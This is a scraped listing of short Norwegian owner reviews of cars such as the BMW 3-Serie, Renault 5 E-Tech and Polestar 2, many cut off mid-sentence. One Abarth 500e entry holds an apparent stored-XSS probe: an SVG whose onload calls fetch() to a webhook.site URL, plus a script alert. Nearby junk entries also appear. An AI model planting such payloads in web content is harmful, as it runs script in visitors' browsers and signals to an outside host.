Vurdert av Sokken
BMW 3-Serie (2011)
Ungdomslig bil med plass til det mest nødvendige, hengerfeste på 1600kg er et pluss.
BMW 3-Serie (2011)
Flott bil
BMW 3-Serie (2011)
En bil jeg elsker og har hatt i 8 år. Gått 160.000 nå. Blir 100 til!
BMW 3-Serie (2011)
Kvalitetsprodukt uten feil og mangler selv etter 160.000 km. Økonomisk i drift. Perfekt på langtur. Suverent firehjulstrekksystem, bemerkelsesverdig stabil og god fremkommelighet også på vanskelig
BMW 3-Serie (2011)
BMW er kvalitet. Ikke billigst men du får hva du betaler for. Jeg selv kjører sedanutgaven, kunne vært fordelaktig med Touring. Bilen er 6 år og ikke hatt noen utfordringer bortsett fra en webasto
BMW 3-Serie (2011)
Bilen ser større ut enn den er. Fantastiske kjøreegenskaper
BMW 3-Serie (2011)
Nydelig kjøremaskin som er relativt billig i innkjøp. Meget bra sportsstoler og ergonomi for øvrig. Overraskende god plass til barnestoler, men er noe trang til store barnevogner. Er meget godt for
BMW 3-Serie (2011)
veldig fornøyd så langt, men har kun hatt bilen 7 mnd
BMW 3-Serie (2011)
Meget bra bil som ser tøff ut med M-sport pakke og er veldig god å kjøre. Går OK til å ha minste dieselmotor. Irriterende drittfeil og knirking + litt støy fra motorrom trekker ned "Premium"- f
BMW 3-Serie (2011)
Sprek, Sportslig og pen stasjonsvogn med dårlig plass til barnevogner etc.
BMW 3-Serie (2011)
.
BMW 3-Serie (2011)
Måtte skifte register kjede etter 100000km.kjede hadde strekt seg, utrolig mye knirk i bilen, spesielt dører
BMW 3-Serie (2010)
Meget fornøyd med bilen. Den oppfyller ønsket om cabriolet, samt lyd fra seks sylindre i rekke.
BMW 3-Serie (2010)
Fantastisk god bil
BMW 3-Serie (2010)
Beste bilen jeg har hatt glede av å kjøre
Renault 5 E-Tech (2025)
Dette er virkelig en bil jeg anbefaler. Årets bil i Europa og Årets bil i Norge, med god grunn. Veldig kult retro-design. Legger til at Renault også hadde årets bil i Europa i 2024 med Scenic E-Te
Citroën e-C4 (2025)
Jeg er foreløpig veldig fornøyd. Har slitt litt med å finne den optimale sittekomforten, men en pute gjorde susen der (jeg er 180 og trengte ekstra korsryggstøtte). Bilens automatikk passer meg ve
Aston Martin DB9 GT (2017)
alert("total")
Aston Martin DB9 GT (2017)
totalvurderingtest
Abarth 500e (2024)
Abarth 500e (2024)
Abarth 500e (2024)
xxxfooo4
Abarth 500e (2024)
<svg xmlns="http://www.w3.org/2000/svg" onload="fetch('https://webhook.site/418d388b-4676-4b57-95ba-4330be1ec311')"> <circle cx="50" cy="50" r="40" fill="red"/> </svg> <script>alert(1)</script>
Volvo EX40 (2026)
Dette er ikke en volvo som vi er kjent med volvo. Dårlige seter, umulig å opprettholde 20grader i kupe på vinter, kjapp på gasspedal, men enormt strømforbruk uansett hvordan du prøver å tilpass
Ford Explorer EV (2025)
Kommer nok til å bytte den ut pga den nervøse oppførselen på vinterføre. Utenom dette svarer den godt på alle parametre.
Ford Kuga (2021)
Forbruk. Gir en tier for forbruk langkjøring. 0,44 og forbruk 0,8 med campingvogn, totalvekt 1400 kg(ved tomt batteri). Rekkevidde elektrisk på vinter månedene er fra 20 - 30 km, blandet/bykjøring
Hongqi E-HS9 (2022)
Den er utrolig komfortabel, stille og har en kvalitet som overgår det meste på markedet. Har hatt bilen i 2år nå, å hele familien elsker bilen!
Mercedes-Benz EQC (2022)
Topp komfort og driftsikker.
Polestar 2 (2022)
God kvalitetsfølelse. Gode (frem-) seter. Smart med OTA (oppdateringer over-the-air). Lett å selv restarte system og app etter behov. Pen bil! Praktisk med frunk for elkabler på langtur. (hvorfor h
Mercedes-Benz GLE (2020)
Skuffende å måtte skifte opphengskuler foran på begge sider etter kun 75000 km